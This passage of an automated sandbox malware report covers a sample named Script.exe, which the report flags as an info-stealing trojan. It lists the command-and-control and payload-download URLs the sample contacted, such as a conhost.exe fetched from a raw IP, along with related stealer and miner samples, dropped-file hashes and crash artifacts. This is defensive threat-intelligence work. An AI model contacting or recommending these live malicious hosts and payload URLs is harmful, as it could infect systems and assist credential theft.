https://property-imper.sbs/	aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143157759.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/(	aspnet_regiis.exe, 00000003.00000003.2164739586.00000000051BE000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164630592.00000000051B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164351137.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/$	aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/api;I	aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.47.81/v	aspnet_regiis.exe, 00000003.00000002.2525059379.0000000002EB4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/b	aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs:443/apiK	aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microh	aspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/apiN	aspnet_regiis.exe, 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000003.00000003.2187435228.00000000051F9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/Z	aspnet_regiis.exe, 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.47.81/conhost.exet	aspnet_regiis.exe, 00000003.00000002.2525039530.0000000002EAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/apiZuV	aspnet_regiis.exe, 00000003.00000003.2252014610.00000000051D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523832590.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2525465526.00000000051D7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235406120.00000000051D5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2279021640.00000000051D6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://property-imper.sbs/R	aspnet_regiis.exe, 00000003.00000002.2524937110.0000000002E81000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://property-imper.sbs/pi	aspnet_regiis.exe, 00000003.00000003.2251568762.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2252261385.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235233881.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235371345.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.33.116	property-imper.sbs	United States		13335	CLOUDFLARENETUS	false
147.45.47.81	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561303
Start date and time:	2024-11-23 03:10:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Script.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@1/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aspnet_regiis.exe, PID 768 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:11:07	API Interceptor	9x Sleep call for process: aspnet_regiis.exe modified
21:11:34	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.33.116	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	https://trk.contentbasepro.com/director/global/Fw7NuShXblevjUFDSLZ8kQ==/fallback/?sl1=5ce983c7-d1b3-95c9-2cd6-495d0a377092&sl2=4MQMyhq6&sl3=opBRlAiH&sl4=qUjNxiIm&transaction_id=68bifqbz8u1x&aff_id=350046&aff_sub=735313144&rc=R-CT-P-SC&pl=679540491&pc_session_id=92lvvqhjp8p3uckfida1jav7q0-33841&sid=92lvvqhjp8p3uckfida1jav7q0-33841&pc_synd_id=shl_cbs_uk_a1_sh383_pp_2_cxf&partner=shl_cbs_uk_a1_sh383_pp_2_cxf&rr=timer	Get hash	malicious	Unknown	Browse
147.45.47.81	n7ZKbApaa3.dll	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	PqSIlYOaIF.exe	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	Set-up.exe	Get hash	malicious	LummaC	Browse	147.45.47.81/conhost.exe
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81/conhost.exe
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/conhost.exe
	BlazeHack.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	CKHSihDX4S.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	XXZahG4d9Z.exe	Get hash	malicious	RedLine, Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	n6o0pd9pZC.exe	Get hash	malicious	Xmrig	Browse	147.45.47.81/WinRing0x64.sys
	lfjG1UlwP1.exe	Get hash	malicious	LummaC, Xmrig	Browse	147.45.47.81/xmrig.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
property-imper.sbs	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	172.67.162.84

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.155.248
	http://ppc-overwatch.com	Get hash	malicious	Unknown	Browse	104.17.248.203
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.1.231
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Yssr_Receipt.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	Pyyidau.vbs	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
FREE-NET-ASFREEnetEU	https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org	Get hash	malicious	HTMLPhisher	Browse	147.45.178.112
	http://147.45.47.98/js/error.js	Get hash	malicious	Unknown	Browse	147.45.47.98
	hmips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	ppc.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	mips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	x86.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	owari.mips.elf	Get hash	malicious	Unknown	Browse	147.45.234.212
	pdusf6w2SJ.exe	Get hash	malicious	RedLine	Browse	147.45.44.221
	ppc.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	hmips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116
	file.exe	Get hash	malicious	Unknown	Browse	104.21.33.116

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Script.exe_501b84e33378948dc4e29bf5ce7dbb49857e225_f9569dfc_59b733d4-3678-41e0-85f8-83fbaec77459\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9841274532355747
Encrypted:	false
SSDEEP:	96:zoFf5Fjn+5ALFHoHXwGMldvxmoijCQXIDcQvc6QcEVcw3cE/H+BHUHZ0ownOgHkF:EBjNHoKkd0BU/qaetizuiFzZ24IO8K
MD5:	6678905D5EB0F8E35635FB6933FDC319
SHA1:	88FBF51FDDA4A05A0D211EABFC2F2D52C11D20D8
SHA-256:	B5F34D3E0EC3A1517C5E4B829C77B4D73CA423082BE72752D992D1E3654A7844
SHA-512:	643B3785E42DAEAA36A7714BCED61D210C67272772B3A55FDF6B341AB7A81E820FE8AA1288201D9F8AE26FA386CF585E6F07777EB04EF45F1BBCC99B2B58256A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.0.1.4.6.5.8.0.0.7.4.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.0.1.4.6.6.4.8.8.2.5.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.b.7.3.3.d.4.-.3.6.7.8.-.4.1.e.0.-.8.5.f.8.-.8.3.f.b.a.e.c.7.7.4.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.e.6.6.3.0.f.-.7.3.a.3.-.4.2.5.b.-.9.4.a.4.-.8.4.5.5.6.0.1.8.6.c.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.c.r.i.p.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.a.t.h.a.n.E.l.e.a.n.o.r.B.e.n.j.a.m.i.n...h.D.w.Y.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.0.-.0.0.0.1.-.0.0.1.4.-.1.3.a.3.-.5.4.f.3.4.c.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.5.9.3.5.6.b.5.d.0.9.1.8.f.d.2.c.4.0.2.e.b.f.f.f.7.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0F2.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Nov 23 02:11:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	201076
Entropy (8bit):	3.335613011480351
Encrypted:	false
SSDEEP:	1536:zdJLGl2wpN4uE2aO0yLTgPIR2tqCD2KwTAHu8U:xS4uEqRLTgPe272Kms
MD5:	B6D2C2BA8BD05EC7BE958B2AE516BAE4
SHA1:	E7964D0A60F8CBD71F8F7126EB4DDED5C322AD55
SHA-256:	53336A96B7AD862957A5076DF12779DAE3D24660CBF8F245D4B0B5E1D45D2C43
SHA-512:	B3BE91C2C0EF96F8B42855A2BF0BB5F263B8530C62DDE93F7730F7949931BEC56BB239ADD04D7C616F978175A67AA6424343E42D236942B999E5E31345CE98AF
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........9Ag............t.......................$...8............M..........`.......8...........T...........00..D...........\...........H ..............................................................................eJ....... ......GenuineIntel............T............9Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1FC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8406
Entropy (8bit):	3.706284442240866
Encrypted:	false
SSDEEP:	192:R6l7wVeJCi6uC7L6YEI5SU9ehgmfZiYeipr089bjLsfZtBm:R6lXJ36d6YEGSU9ehgmf4Ye2jQfZC
MD5:	1D787978B1DAA13AA5115C8C6F0AD9DD
SHA1:	338D9E558BC82982EF7C7ABF8708417D77B91F8F
SHA-256:	72CF3D42D8AF0E1C39105C3D89A41D7B0090145DE4D6B9FA1BE504063D7C6AEC
SHA-512:	0A01968230E9571448FBD2216BA86B59CAF5198063D8154A6D525620EA35FFCEE818790F262B4211250D5238D0D64CADA94AF3CA9C7CBBE398510B7B785DBE75
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA22C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4769
Entropy (8bit):	4.513182933973075
Encrypted:	false
SSDEEP:	48:cvIwWl8zs+Jg77aI9rwWpW8VYIsYm8M4Jq0S2Fx+q8vKSiyNEMX0DwMb4d:uIjf0I7lJ7VjpJFKIRMELUd
MD5:	EC4199AA14BC64E7A2D50E4FE35FC4BF
SHA1:	08B24AFCBD9FE5DF1B425028CDB5424D573009DF
SHA-256:	D38E54A7DCB00FF8D84C0D90D26E0FBB09667DBB6E34A7D0DFE3FD9A39BD69BB
SHA-512:	39A0A197C37C69B639B0906DD4E087431C86CC3EDBC497E301EAF7D694E522E98C31DA94A37BC485C651C191593BCD3AB543B325D93F53C43D6D6FFC7E5A3605
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600073" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Users\user\Desktop\Script.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455168
Entropy (8bit):	7.10849276789882
Encrypted:	false
SSDEEP:	12288:YeFpDFrrXILt+I2V75hGT29Ud9qtOzY3bkNe+gfg5uH6dBVCybrP/F4fhd3L0iWw:5HFrrXILt+I2V75hGT29Ud9qtOzYrkNZ
MD5:	91A02180EC73E9ABBC6AA4147E064290
SHA1:	8228CBAFC40B69D6F25F251A8CE3F79A6E44262C
SHA-256:	DE595E16010E0DFA94562AD992402B1D80E97B23A041F8E7C9D9EE562BF9DDFB
SHA-512:	03B865E3E9F50BC7F880D03BC04921BB58250A1772BC3BE406EE13BA538857ECF3FE904CE753562DD22F4AA00CD2C3A56C873AE2CE5D063F4F372B7262E40EE8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........V...............................................0............@.............................\|.......P...............................(...\...............................x...@...............T............................text...8........................... ..`.rdata...\.......^..................@..@.data........ ......................@....reloc..(...........................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422052187708564
Encrypted:	false
SSDEEP:	6144:aSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:JvloTMW+EZMM6DFyO03w
MD5:	81D5A44CA15A9E9D5B9C99651F0E3C9D
SHA1:	3E496309FA200DEEBE6703D7B00574AE574C50A9
SHA-256:	225BA12C2E0435D1F49E85EBFA2B850DD631B28F0E8F18A1D46D15CD1C44DC68
SHA-512:	E983F094365F3A9735BC3708C0AF779490D9897F74A2BCAB5DD20062A8E606066DEAA0B308B1DA7D07D9BCDD7D8691FB60DB5FDBD48138A04FF5C63C20138B5B
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmb...L=..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\Script.exe
File Type:	ASCII text, with very long lines (357), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	1417
Entropy (8bit):	4.538576953964489
Encrypted:	false
SSDEEP:	24:7v74Nui2MvXIUn2p/kpgw4r22Drrb2nknl1sDp:7T4l2Mff2p8p14nrPKkkp
MD5:	1B67286EBD118AD70110B651210A5B6B
SHA1:	5020EA152CF7F31F986AA25CC17D9AD2B1340336
SHA-256:	7742760E8562AF1671C72E7C2842DBBF8EFC824D2D2102DDE248784F3843BA7B
SHA-512:	54F7526FACF42F40F1D355C515D648105529478DFC0E981BB7049FB4EAE0631D521D4708237C1A9D24D481405880C97E6CD0C7E228C1D525E97B9996528C6CD1
Malicious:	false
Reputation:	low
Preview:	.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "NathanEleanorBenjamin" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.Ge

Static File Info

General

